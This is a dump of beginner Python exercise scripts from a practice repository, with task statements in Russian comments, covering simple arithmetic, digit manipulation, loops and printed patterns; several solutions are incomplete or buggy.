"blob_id": "63fee284f3c5e11db4ab1f676322232603b9a841",
"content_id": "f9ab75e25471d2a9409a1915b6b33d7c8393957b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 294,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 14,
"path": "/Practic/Tasks/50.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны три числа. Написать \"yes\", если среди них есть одинаковые.\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\nz = int(input(\"z:\"))\n\nif x == y == z:\n print (\"Yes\")\nif x == y:\n print(\"Yes\")\nif x == z:\n print(\"Yes\")\nif y == z:\n print(\"Yes\")\n"
},
{
"alpha_fraction": 0.46492984890937805,
"alphanum_fraction": 0.5991984009742737,
"avg_line_length": 20.69565200805664,
"blob_id": "3f3704eda495bf87aed87d06272bcccae589d69c",
"content_id": "662462eb9a7f9ee3400b562744aee3272e26815b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 573,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 23,
"path": "/Practic/Tasks/62.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано пятизначное число. Цифры на четных позициях занулить. Например, из 12345 получается число 10305.\n\n\nvalue = int(input(\"Value:\"))\n\n\ndigit_1 = value // 10000\ndigit_2 = value // 1000 % 10\ndigit_3 = value // 100 % 10\ndigit_4 = value // 10 % 10\ndigit_5 = value % 10\n\nif digit_1 % 2 == 0:\n digit_1 = 0\nif digit_2 % 2 == 0:\n digit_2 = 0\nif digit_3 % 2 == 0:\n digit_3 = 0\nif digit_4 % 2 == 0:\n digit_4 = 0\nif digit_5 % 2 == 0:\n digit_5 = 0\nprint(digit_1,digit_2,digit_3,digit_4,digit_5)\n"
},
{
"alpha_fraction": 0.5754716992378235,
"alphanum_fraction": 0.599056601524353,
"avg_line_length": 15.307692527770996,
"blob_id": "297f83ff5b30836041fd8f9b25097e6da3d29568",
"content_id": "b04178de67fd7b26e846790449b33cccd6296df8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 262,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 13,
"path": "/Practic/Tasks/36.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит номер месяца, вывести название месяца.\n\n\nx = int(input(\"x:\"))\n\nif x == 1:\n print(\"January\")\nelif x == 2:\n print(\"February\")\nelif x == 3:\n print(\"March\")\nelse:\n print(\"input 1-3\")\n"
},
{
"alpha_fraction": 0.5503876209259033,
"alphanum_fraction": 0.5503876209259033,
"avg_line_length": 18.846153259277344,
"blob_id": "bda0d5644cdfa782c377af69191e0b0092d6983b",
"content_id": "33cd6e047d5e53118a6aae46215bfa59d80346e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 328,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 13,
"path": "/Practic/Tasks/51.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны три числа. Написать \"yes\", если можно взять какие-то два из них и в сумме получить третье\n\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\nz = int(input(\"z:\"))\n\nif x + y == z:\n print(\"Yes\")\nif x + z == y:\n print(\"Yes\")\nif y + z == x:\n print(\"Yes\")\n"
},
{
"alpha_fraction": 0.597484290599823,
"alphanum_fraction": 0.6289308071136475,
"avg_line_length": 25.5,
"blob_id": "242fad62e59db41171107dd8a3042aeb36f852d7",
"content_id": "5d71cdaf3f36631caa97c49f3ec5d450635c10c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 222,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 6,
"path": "/Practic/Tasks/106.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран n единиц, затем 2n двоек, затем 3n троек. Число n вводит пользователь.\n\nn = int(input(\"n:\"))\nprint (\"1\" * n)\nprint (\"2\" * n)\nprint (\"3\" * n)\n"
},
{
"alpha_fraction": 0.5194507837295532,
"alphanum_fraction": 0.5240274667739868,
"avg_line_length": 26.25,
"blob_id": "5547011a9439a9085a67fcf27b7b64add847989a",
"content_id": "10f3fa716c4184ed06eb5c41caa6440060748131",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 560,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 16,
"path": "/Practic/Tasks/85_.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "# Пользователь вводит количество строк. Вывести на экран логотип соответствующего размера. Если текст не помещается, то вывести логотип без текста.\n\na = int(input(\"a:\"))\nb = int(input(\"b:\"))\n\nfor i in range(a):\n if i == 0 or i == a:\n for j in range(a):\n print(\"[\", end=\" \")\n\n else:\n print(\"[\", end=\" \")\n for j in range(1, b):\n print(\":\", end=\" \")\n print(\"[\", end=\" \")\n print()\n\n"
},
{
"alpha_fraction": 0.6056910753250122,
"alphanum_fraction": 0.6382113695144653,
"avg_line_length": 26.33333396911621,
"blob_id": "52c32dc77e5a56288b9bcabedb5bc19dc1e27a2b",
"content_id": "059c1ab2a5dfaf7ed3fb442dcc3a82a62dcc845e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 346,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 9,
"path": "/Practic/Tasks/44.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит два числа. Если они не равны 10 и первое число четное, то вывести их сумму, иначе вывести их произведение.\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\n\nif x !=10 and y != 10 and x % 2 == 0:\n print(x+y)\nelse:\n print(x*y)\n"
},
{
"alpha_fraction": 0.37378641963005066,
"alphanum_fraction": 0.4902912676334381,
"avg_line_length": 24.75,
"blob_id": "de51af5cfc230c60f1ccf5f1feb316835518983a",
"content_id": "9251e12d204b2f803607dc72a3b232a0af02e5dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 254,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 8,
"path": "/Practic/Tasks/103.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Найдите трехзначные числа, равные сумме кубов своих цифр.\n\nfor i in range(100, 999):\n d_1 = i // 100\n d_2 = i // 10 % 10\n d_3 = i % 10\n if d_1 ** 3 + d_2 ** 3 + d_3 ** 3 == i:\n print(i)\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5133333206176758,
"avg_line_length": 15.666666984558105,
"blob_id": "6e7527bccaa5e0755d61fd030641829a240e87db",
"content_id": "0bde71639abc55e25120d11cf4285a6068ec34b8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 196,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 9,
"path": "/Practic/Tasks/108.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Выведите на экран строки (в последней строке n звездочек):\n#*\n#**\n#***\n#****\n#*****\nn = int(input(\"n:\")) + 1\nfor i in range (1,n):\n print(\"*\"*i)\n"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.695035457611084,
"avg_line_length": 19.14285659790039,
"blob_id": "88d0aa18e4f314fe924fa2c33141024bba37442d",
"content_id": "edb4271e7dfb2239a0c0b60f2192b4d74f33966b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 217,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 7,
"path": "/Practic/Tasks/22.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано значение температуры в градусах Цельсия. Вывести температуру в градусах Фаренгейта.\n\nt = int(input(\"t:\"))\n\nf = t * 9/5 + 32\n\nprint(f)\n"
},
{
"alpha_fraction": 0.6938775777816772,
"alphanum_fraction": 0.7074829936027527,
"avg_line_length": 48,
"blob_id": "7049b612edcecb5fcf29bbbe5e50cc7ee268376b",
"content_id": "70db50c034eb3e6099f6e621cc64eeba4fcbfe46",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 237,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 3,
"path": "/Practic/Tasks/107-.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести ряд чисел: десять десяток, девять девяток, восемь восьмерок, ... , одну единицу. Найти сумму всех этих чисел.\nfor i in \"10\":\n print(i)\n"
},
{
"alpha_fraction": 0.4921875,
"alphanum_fraction": 0.6145833134651184,
"avg_line_length": 41.55555725097656,
"blob_id": "3d26f0a71b167debf9e8c9342ac4459a1cde4a14",
"content_id": "74212a9c81f90a1ff604d49f351af1bf77523297",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 431,
"license_type": "no_license",
"max_line_length": 141,
"num_lines": 9,
"path": "/Practic/Tasks/99.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран числа от 1000 до 9999 такие, что все цифры различны.\n\nfor value in range(1000, 9999):\n digit_1 = value // 1000\n digit_2 = value // 100 % 10\n digit_3 = value // 10 % 10\n digit_4 = value % 10\n if digit_1 != digit_2 and digit_1 != digit_3 and digit_1 != digit_4 and digit_2 != digit_3 and digit_2 != digit_4 and digit_3 != digit_4:\n print(value)\n\n"
},
{
"alpha_fraction": 0.6910569071769714,
"alphanum_fraction": 0.6951219439506531,
"avg_line_length": 23.600000381469727,
"blob_id": "5c91f5b94d9039e312a5509c00e210f677df4730",
"content_id": "1ac902f88c637d236fbc38ee5469e58e998d630f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 381,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 10,
"path": "/Practic/Tasks/23.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Известно, что x кг конфет стоит a рублей. Определите, сколько стоит y кг этих конфет,\n# а также сколько кг конфет можно купить на k рублей. Все значения вводит пользователь.\n\n\n\na = float(input(\"a:\"))\n\nx = float(input(\"x:\"))\n\nprint(\"1 кг:\", a/x)\n"
},
{
"alpha_fraction": 0.5806451439857483,
"alphanum_fraction": 0.6428571343421936,
"avg_line_length": 32.38461685180664,
"blob_id": "a0f9427447fbd4631b074b9633d220b4df5c24f1",
"content_id": "688abae843ef2bba0141d85dbbf35e9941eda9e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 619,
"license_type": "no_license",
"max_line_length": 272,
"num_lines": 13,
"path": "/Practic/Tasks/84.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит курс доллара в рублях. Показать таблицу цен 1$, 2$, ..., 100$ в рублях, третьим столбцом добавить количество кг конфет, которые можно купить на данные суммы, если цена 1 кг конфет равна 20 руб. Пример: 1$ - 70 р - 3.5 кг и так далее (всего 100 строк).\n\ni = 1\nua = 0\ncandies = 0\n\nwhile i < 101:\n print(i,\"dolar\")\n ua += 27\n print(\"ua:\",ua)\n candies += 3.5\n print(\"candies:\",candies,\"kg\")\n i += 1\n"
},
{
"alpha_fraction": 0.631147563457489,
"alphanum_fraction": 0.6393442749977112,
"avg_line_length": 17.769229888916016,
"blob_id": "d5d48f570dec25225a5ce013285919e7f900f6c0",
"content_id": "4292a33dc2da6c61ae3bc00914be71efe1c5ccfe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 286,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 13,
"path": "/Practic/Tasks/110.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран:\n#AAABBBAAABBBAAABBB\n#BBBAAABBBAAABBBAAA\n#AAABBBAAABBBAAABBB\n#(таких строк n, в каждой строке m троек AAA)\n\nn = int(input(\"n:\"))\nm = int(input(\"m:\"))\ni = 0\nwhile i < n:\n i+=1\n print(\"AAABBB\" * m)\n print(\"BBBAAA\" * m)\n"
},
{
"alpha_fraction": 0.6111111044883728,
"alphanum_fraction": 0.625,
"avg_line_length": 19.571428298950195,
"blob_id": "6a8eca890e1d0c32f3540977683d14a84cf3f04f",
"content_id": "b313d780b0e875ca35fe2a60459f8ac81d3cfd43",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 208,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 7,
"path": "/Practic/Tasks/18.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит сторону квадрата. Найдите периметр и площадь квадрата.\n\na = int(input(\"a:\"))\n\np= 4 * a\ns= a ** 2\nprint(\"p:\",p,'\\t','s:',s)\n"
},
{
"alpha_fraction": 0.6441947817802429,
"alphanum_fraction": 0.6741573214530945,
"avg_line_length": 21.25,
"blob_id": "7a4bf1ac8bb73354a32fb7c7304cd11e2f07a0c5",
"content_id": "9a1c24e1dee0560da0653c789da74d6253385c03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 365,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 12,
"path": "/Practic/Tasks/25.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит количество недель, месяцев, лет и получает количество дней за это время.\n# Считать, что в месяце 30 дней.\n\nweek = int(input(\"week:\"))\n\nmonth = int(input(\"month:\"))\n\nyear = int(input(\"year:\"))\n\nday = week * 7 + month * 30 + year * 360\n\nprint(day)\n"
},
{
"alpha_fraction": 0.5174418687820435,
"alphanum_fraction": 0.5174418687820435,
"avg_line_length": 11.285714149475098,
"blob_id": "9c3dd75246eba29cad26126ee8a071b1d52d7d6d",
"content_id": "1b6bd232de23f4e960d58853a0faf2591ae4845a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 211,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 14,
"path": "/Practic/Tasks/47.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны три числа. Найдите наибольшее число из них.\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\nz = int(input(\"z:\"))\n\nb = x\n\nif x < y:\n b = y\nif b < z:\n b = z\n\nprint(b)\n"
},
{
"alpha_fraction": 0.5149253606796265,
"alphanum_fraction": 0.5597015023231506,
"avg_line_length": 15.75,
"blob_id": "b55f9a6adb2c437a8df20dba96babb94166e1443",
"content_id": "cf082342202ee7b88f50f467b85e45d6ba2acdf9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 165,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 8,
"path": "/Practic/Tasks/92.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран сто первых сумм вида 1+2+3+...+n.\ni = 0\nn = int(input(\"n:\"))\nsumm = 0\nwhile i < n:\n i+=1\n summ+=i\nprint(summ)\n"
},
{
"alpha_fraction": 0.5211970210075378,
"alphanum_fraction": 0.5901911854743958,
"avg_line_length": 16.691177368164062,
"blob_id": "8655117207ffc9fdf2ce43718c9b3c7d84e552e2",
"content_id": "a4078e65c97765e1aa911a266881fceca5d522f1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1268,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 68,
"path": "/Practic/Tasks/67.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано четырехзначное число. Поменяйте местами наименьшую и наибольшую цифры.\n\nvalue = int(input(\"value:\"))\n\ndigit_1 = value // 1000\ndigit_2 = value // 100 % 10\ndigit_3 = value // 10 % 10\ndigit_4 = value % 10\n\nmaxx = digit_1\n\nminn = digit_1\n\nif digit_1 < digit_2:\n maxx = digit_2\nif maxx < digit_3:\n maxx = digit_3\nif maxx < digit_4:\n maxx = digit_4\nif digit_1 > digit_2:\n minn = digit_2\nif minn > digit_3:\n minn = digit_3\nif minn > digit_4:\n minn = digit_4\n\nprint(maxx,minn)\n\nbuff = minn\nbuff1 = 0\nbuff2 = 0\n\nif maxx == digit_1:\n digit_1 = maxx\n buff1 = digit_1 #max\n digit_1 = minn\nif maxx == digit_2:\n digit_2 = maxx\n buff1 = digit_2\n digit_2 = minn\nif maxx == digit_3:\n digit_3 = maxx\n buff1 = digit_3\n digit_3 = minn\nif maxx == digit_4:\n digit_4 = maxx\n buff1 = digit_4\n digit_4 = minn\n\n\nif minn == digit_1:\n digit_1 = minn\n buff2 = digit_1 #max\n digit_1 = maxx\nif maxx == digit_2:\n digit_2 = minn\n buff2 = digit_2\n digit_2 = maxx\nif maxx == digit_3:\n digit_3 = minn\n buff2 = digit_3\n digit_3 = maxx\nif maxx == digit_4:\n digit_4 = minn\n buff2 = digit_4\n digit_4 = maxx\n\nprint(digit_1,digit_2,digit_3,digit_4)\n"
},
{
"alpha_fraction": 0.6121212244033813,
"alphanum_fraction": 0.6242424249649048,
"avg_line_length": 24.384614944458008,
"blob_id": "e65db5eb42f12ac917c5f9fa8d3dbf1d07168e89",
"content_id": "6ab3395bc884eca5f7dbfc85b476bf7aebd8b7fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 465,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 13,
"path": "/Practic/Tasks/17.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит три числа. Найдите среднее арифметическое этих чисел,\n# а также разность удвоенной суммы первого и третьего чисел и утроенного второго числа.\nimport math\n\na = int(input(\"a:\"))\nb = int(input(\"b:\"))\nc = int(input(\"c:\"))\n\nmean = ( a + b + c ) / 3\n\nd = a * 2 - c * 2 - b * 3\n\nprint(\"mean:\" ,mean, \"\\t\", \"d:\", d)\n"
}
] | 111 |
Benyjuice/XwareDesktop
|
https://github.com/Benyjuice/XwareDesktop
|
fbd4c336f16ca91d35a153d7e439db8c93b36d3d
|
98beeac4b1c86be185b803021c5c2392cd3b2508
|
f6ecd0c02efbb5a19f51cff6f43e1b8dfdc5d387
|
refs/heads/master
| 2021-01-18T14:09:40.668986 | 2014-08-02T06:20:02 | 2014-08-02T06:20:02 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5532251596450806,
"alphanum_fraction": 0.5544123649597168,
"avg_line_length": 29.08333396911621,
"blob_id": "47fa9027f324ad37f0f68f13f31903596d248d2f",
"content_id": "54998ca2ab80dbcb348b33e04ce3a550afc76cb3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2527,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 84,
"path": "/src/frontend/libxware/map.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom collections import OrderedDict\nfrom .vanilla import TaskClass\nfrom .item import XwareTaskItem as Item\n\n\n_RUNNING_SPEED_SAMPLE_COUNT = 25\n\n\nclass Tasks(OrderedDict):\n \"\"\"TaskModel underlying data\"\"\"\n\n def __init__(self, adapter, klass):\n super().__init__()\n assert isinstance(klass, TaskClass)\n self.adapter = adapter\n self._klass = klass\n\n def updateData(self, updatingList = None):\n updating = dict(zip(\n map(lambda i: \"{ns}|{id}\".format(ns = self.adapter.namespace, id = i[\"id\"]),\n updatingList),\n updatingList))\n\n currentKeys = set(self.keys())\n updatingKeys = set(updating.keys())\n\n addedKeys = updatingKeys - currentKeys\n modifiedKeys = updatingKeys & currentKeys # Alter/change/modify\n removedKeys = currentKeys - updatingKeys\n\n for k in modifiedKeys:\n self[k].update(updating[k], self._klass)\n\n for k in addedKeys:\n # Note: __setitem__ is overridden\n self[k] = updating[k]\n\n for k in removedKeys:\n # Note: __delitem__ is overridden\n del self[k]\n\n def __setitem__(self, key, value, **kwargs):\n if key in self:\n raise ValueError(\"__setitem__ is specialized for inserting.\")\n ret = self.beforeInsert(key)\n if ret:\n if isinstance(ret, Item):\n item = ret\n item.update(value, self._klass)\n else:\n item = Item(adapter = self.adapter)\n item.update(value, self._klass)\n super().__setitem__(key, item)\n self.afterInsert()\n\n def __delitem__(self, key, **kwargs):\n if self.beforeDelete(self.index(key)):\n popped = self[key]\n super().__delitem__(key)\n self.moveToStash(popped)\n self.afterDelete()\n\n def index(self, key):\n return list(self.keys()).index(key)\n\n # =========================== FOREIGN DEPENDENCY ===========================\n # When attached to TaskManager, set by it\n def beforeInsert(self, key):\n raise NotImplementedError()\n\n def afterInsert(self):\n raise NotImplementedError()\n\n def beforeDelete(self, index):\n raise NotImplementedError()\n\n def moveToStash(self, item):\n raise NotImplementedError()\n\n def afterDelete(self):\n raise NotImplementedError()\n # ======================== END OF FOREIGN DEPENDENCY ========================\n"
},
{
"alpha_fraction": 0.6288007497787476,
"alphanum_fraction": 0.6298811435699463,
"avg_line_length": 31.888324737548828,
"blob_id": "7e441a8a271891510a764b6db3c2fad1dba5be9d",
"content_id": "0758ab7b44fed33038f6a98e56b60171d73efa11",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6479,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 197,
"path": "/src/frontend/libxware/adapter.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom launcher import app\n\nimport asyncio\nfrom concurrent.futures import ThreadPoolExecutor\nfrom functools import partial\nimport threading, uuid\n\nfrom PyQt5.QtCore import QObject, pyqtSignal, pyqtProperty\nfrom .vanilla import TaskClass, XwareClient, Settings\nfrom .map import Tasks\n\n_POLLING_INTERVAL = 1\n\n\nclass XwareSettings(QObject):\n updated = pyqtSignal()\n\n def __init__(self, parent):\n super().__init__(parent)\n self._settings = None\n\n @pyqtProperty(int, notify = updated)\n def downloadSpeedLimit(self):\n return self._settings.downloadSpeedLimit\n\n @pyqtProperty(int, notify = updated)\n def uploadSpeedLimit(self):\n return self._settings.uploadSpeedLimit\n\n @pyqtProperty(int, notify = updated)\n def slStartTime(self):\n return self._settings.slStartTime\n\n @pyqtProperty(int, notify = updated)\n def slEndTime(self):\n return self._settings.slEndTime\n\n @pyqtProperty(int, notify = updated)\n def maxRunTaskNumber(self):\n return self._settings.maxRunTaskNumber\n\n @pyqtProperty(int, notify = updated)\n def autoOpenLixian(self):\n return self._settings.autoOpenLixian\n\n @pyqtProperty(int, notify = updated)\n def autoOpenVip(self):\n return self._settings.autoOpenVip\n\n @pyqtProperty(int, notify = updated)\n def autoDlSubtitle(self):\n return self._settings.autoDlSubtitle\n\n def update(self, settings: Settings):\n self._settings = settings\n self.updated.emit()\n\n\nclass XwareAdapter(QObject):\n update = pyqtSignal(int, list)\n\n def __init__(self, clientOptions):\n super().__init__()\n self._mapIds = None\n self._ulSpeed = 0\n self._dlSpeed = 0\n self._xwareSettings = XwareSettings(self)\n self._loop = asyncio.get_event_loop()\n self._uuid = uuid.uuid1().hex\n self._xwareClient = XwareClient(clientOptions)\n\n @property\n def namespace(self):\n return \"xware-\" + self._uuid\n\n @property\n def ulSpeed(self):\n return self._ulSpeed\n\n @ulSpeed.setter\n def ulSpeed(self, value):\n if value != self._ulSpeed:\n self._ulSpeed = value\n app.adapterManager.ulSpeedChanged.emit()\n\n @property\n def dlSpeed(self):\n return self._dlSpeed\n\n @dlSpeed.setter\n def dlSpeed(self, value):\n if value != self._dlSpeed:\n self._dlSpeed = value\n app.adapterManager.dlSpeedChanged.emit()\n\n @property\n def backendSettings(self):\n return self._xwareSettings\n\n def updateOptions(self, clientOptions):\n self._xwareClient.updateOptions(clientOptions)\n\n # =========================== PUBLIC ===========================\n @asyncio.coroutine\n def main(self):\n # Entry point of the thread \"XwareAdapterEventLoop\"\n # main() handles non-stop polling\n\n runningId = yield from app.taskModel.taskManager.appendMap(\n Tasks(self, TaskClass.RUNNING))\n completedId = yield from app.taskModel.taskManager.appendMap(\n Tasks(self, TaskClass.COMPLETED))\n recycledId = yield from app.taskModel.taskManager.appendMap(\n Tasks(self, TaskClass.RECYCLED))\n failedOnSubmissionId = yield from app.taskModel.taskManager.appendMap(\n Tasks(self, TaskClass.FAILED_ON_SUBMISSION))\n self._mapIds = (runningId, completedId, recycledId, failedOnSubmissionId)\n\n while True:\n self._loop.call_soon(self.get_getsysinfo)\n self._loop.call_soon(self.get_list, TaskClass.RUNNING)\n self._loop.call_soon(self.get_list, TaskClass.COMPLETED)\n self._loop.call_soon(self.get_list, TaskClass.RECYCLED)\n self._loop.call_soon(self.get_list, TaskClass.FAILED_ON_SUBMISSION)\n self._loop.call_soon(self.get_settings)\n\n yield from asyncio.sleep(_POLLING_INTERVAL)\n\n # 
=========================== META-PROGRAMMING MAGICS ===========================\n def __getattr__(self, name):\n if name.startswith(\"get_\") or name.startswith(\"post_\"):\n def method(*args):\n clientMethod = getattr(self._xwareClient, name)(*args)\n clientMethod = asyncio.async(clientMethod)\n\n donecb = getattr(self, \"_donecb_\" + name, None)\n if donecb:\n curried = partial(donecb, *args)\n clientMethod.add_done_callback(curried)\n setattr(self, name, method)\n return method\n raise AttributeError(\"XwareAdapter doesn't have a {name}.\".format(**locals()))\n\n def _donecb_get_getsysinfo(self, future):\n pass\n\n def _donecb_get_list(self, klass, future):\n result = future.result()\n\n if klass == TaskClass.RUNNING:\n self.ulSpeed = result[\"upSpeed\"]\n self.dlSpeed = result[\"dlSpeed\"]\n mapId = self._mapIds[int(klass)]\n self.update.emit(mapId, result[\"tasks\"])\n\n def _donecb_get_settings(self, future):\n result = future.result()\n self._xwareSettings.update(result)\n\n def do_pauseTasks(self, tasks, options):\n taskIds = map(lambda t: t.realid, tasks)\n self._loop.call_soon_threadsafe(self.post_pause, taskIds)\n\n def do_startTasks(self, tasks, options):\n taskIds = map(lambda t: t.realid, tasks)\n self._loop.call_soon_threadsafe(self.post_start, taskIds)\n\n def do_openLixianChannel(self, taskItem, enable: bool):\n taskId = taskItem.realid\n self._loop.call_soon_threadsafe(self.post_openLixianChannel, taskId, enable)\n\n def do_openVipChannel(self, taskItem):\n taskId = taskItem.realid\n self._loop.call_soon_threadsafe(self.post_openVipChannel, taskId)\n\n\nclass XwareAdapterThread(threading.Thread):\n def __init__(self, options):\n super().__init__(name = \"XwareAdapterEventLoop\", daemon = True)\n self._loop = None\n self._loop_executor = None\n self._adapter = None\n self._options = options\n\n def run(self):\n self._loop = asyncio.new_event_loop()\n self._loop.set_debug(True)\n self._loop_executor = ThreadPoolExecutor(max_workers = 1)\n self._loop.set_default_executor(self._loop_executor)\n asyncio.events.set_event_loop(self._loop)\n\n self._adapter = XwareAdapter(self._options)\n app.adapterManager.registerAdapter(self._adapter)\n asyncio.async(self._adapter.main())\n self._loop.run_forever()\n"
},
{
"alpha_fraction": 0.6147485375404358,
"alphanum_fraction": 0.6154263019561768,
"avg_line_length": 28.987804412841797,
"blob_id": "2e26a68786edcfaebf3d08a096b358ed11809a63",
"content_id": "7bed8003f3329643cf6652cc4f9ab744c2518e73",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7377,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 246,
"path": "/src/frontend/xwaredpy.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import QObject, pyqtSignal, pyqtSlot, pyqtProperty\n\nimport threading, time\nimport os\nfrom utils.misc import tryRemove, trySymlink, tryMkdir\nfrom utils.system import getInitType, InitType\nimport constants\n\nfrom multiprocessing.connection import Client\n\n\nclass _XwaredCommunicationClient(object):\n funcName = None\n args = tuple()\n kwargs = dict()\n sent = False\n conn = None\n response = None\n received = False\n\n def __init__(self):\n self.conn = Client(*constants.XWARED_SOCKET)\n\n def send(self):\n if not self.funcName:\n raise ValueError(\"no funcName\")\n self.conn.send([self.funcName, self.args, self.kwargs])\n self.sent = True\n self.response = self.conn.recv()\n self.received = True\n self.conn.close()\n\n def setFunc(self, funcName):\n if self.sent:\n raise Exception(\"sent already.\")\n self.funcName = funcName\n\n def setArgs(self, args):\n if self.sent:\n raise Exception(\"sent already.\")\n self.args = args\n\n def setKwargs(self, kwargs):\n if self.sent:\n raise Exception(\"sent already.\")\n self.kwargs = kwargs\n\n def getReturnValue(self):\n if not self.sent:\n raise Exception(\"not sent yet.\")\n if not self.received:\n raise Exception(\"not received yet.\")\n return self.response\n\n\nclass InvalidSocket(FileNotFoundError, ConnectionRefusedError):\n pass\n\n\ndef callXwaredInterface(funcName, *args, **kwargs):\n try:\n client = _XwaredCommunicationClient()\n except (FileNotFoundError, ConnectionRefusedError) as e:\n logging.error(\"XwaredInterface InvalidSocket with method {}\".format(funcName))\n raise InvalidSocket(e)\n\n client.setFunc(funcName)\n if args:\n client.setArgs(args)\n if kwargs:\n client.setKwargs(kwargs)\n client.send()\n result = client.getReturnValue()\n logging.info(\"{funcName} -> {result}\".format(**locals()))\n del client\n return result\n\n\n# an interface to watch, notify, and supervise the status of xwared and ETM\nclass XwaredPy(QObject):\n statusUpdated = pyqtSignal()\n\n _etmStatus = None\n _xwaredStatus = None\n _userId = None\n _peerId = None\n _lcPort = None\n\n _t = None\n\n def __init__(self, parent):\n 